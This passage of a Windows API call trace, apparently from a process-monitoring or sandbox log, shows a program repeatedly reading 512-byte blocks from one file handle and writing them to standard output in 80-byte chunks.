lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] GetFileType (hFile=0x50) returned 0x1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] GetFileType (hFile=0x50) returned 0x1 [0194.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.852] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.853] GetFileType (hFile=0x50) returned 0x1 [0194.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.853] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.853] GetFileType (hFile=0x50) returned 0x1 [0194.853] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.853] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.853] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.853] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.977] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] GetFileType (hFile=0x50) returned 0x1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] GetFileType (hFile=0x50) returned 0x1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] GetFileType (hFile=0x50) returned 0x1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] GetFileType (hFile=0x50) returned 0x1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] GetFileType (hFile=0x50) returned 0x1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.978] GetFileType (hFile=0x50) returned 0x1 [0194.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] WriteFile (in: 
hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] GetFileType (hFile=0x50) returned 0x1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] GetFileType (hFile=0x50) returned 0x1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.979] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.979] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.979] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.979] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] GetFileType (hFile=0x50) returned 0x1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] GetFileType (hFile=0x50) returned 0x1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.979] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0194.979] GetFileType (hFile=0x50) returned 0x1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] GetFileType (hFile=0x50) returned 0x1 [0194.979] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.979] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] GetFileType (hFile=0x50) returned 0x1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] GetFileType (hFile=0x50) returned 0x1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] GetFileType (hFile=0x50) returned 0x1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 
[0194.980] GetFileType (hFile=0x50) returned 0x1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.980] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.980] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.980] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.980] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] GetFileType (hFile=0x50) returned 0x1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] GetFileType (hFile=0x50) returned 0x1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] GetFileType (hFile=0x50) returned 0x1 [0194.980] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.980] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] GetFileType (hFile=0x50) returned 0x1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, 
lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] GetFileType (hFile=0x50) returned 0x1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] GetFileType (hFile=0x50) returned 0x1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] GetFileType (hFile=0x50) returned 0x1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] GetFileType (hFile=0x50) returned 0x1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.981] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.981] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] GetFileType (hFile=0x50) returned 0x1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] GetFileType (hFile=0x50) returned 0x1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.981] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.981] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] GetFileType (hFile=0x50) returned 0x1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] GetFileType (hFile=0x50) returned 0x1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] GetFileType (hFile=0x50) returned 0x1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] GetFileType (hFile=0x50) returned 0x1 [0194.982] _get_osfhandle (_FileHandle=1) returned 
0x50 [0194.982] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] GetFileType (hFile=0x50) returned 0x1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] GetFileType (hFile=0x50) returned 0x1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.982] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.982] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.982] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.982] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.982] GetFileType (hFile=0x50) returned 0x1 [0194.982] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] GetFileType (hFile=0x50) returned 0x1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) 
returned 1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] GetFileType (hFile=0x50) returned 0x1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] GetFileType (hFile=0x50) returned 0x1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] GetFileType (hFile=0x50) returned 0x1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] GetFileType (hFile=0x50) returned 0x1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] GetFileType (hFile=0x50) returned 0x1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.983] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0194.983] GetFileType (hFile=0x50) returned 0x1 [0194.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.983] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.983] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.983] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.983] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] GetFileType (hFile=0x50) returned 0x1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] GetFileType (hFile=0x50) returned 0x1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] GetFileType (hFile=0x50) returned 0x1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] GetFileType (hFile=0x50) returned 0x1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] GetFileType (hFile=0x50) returned 0x1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] GetFileType (hFile=0x50) returned 0x1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] GetFileType (hFile=0x50) returned 0x1 [0194.984] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.984] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] GetFileType (hFile=0x50) returned 0x1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0194.985] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.985] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0194.985] _get_osfhandle (_FileHandle=4) returned 0x58 [0194.985] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] GetFileType (hFile=0x50) returned 0x1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] GetFileType (hFile=0x50) returned 0x1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] GetFileType (hFile=0x50) returned 0x1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] GetFileType (hFile=0x50) returned 0x1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.985] GetFileType (hFile=0x50) returned 0x1 [0194.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0194.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0194.986] GetFileType (hFile=0x50) returned 0x1 [0194.986] 
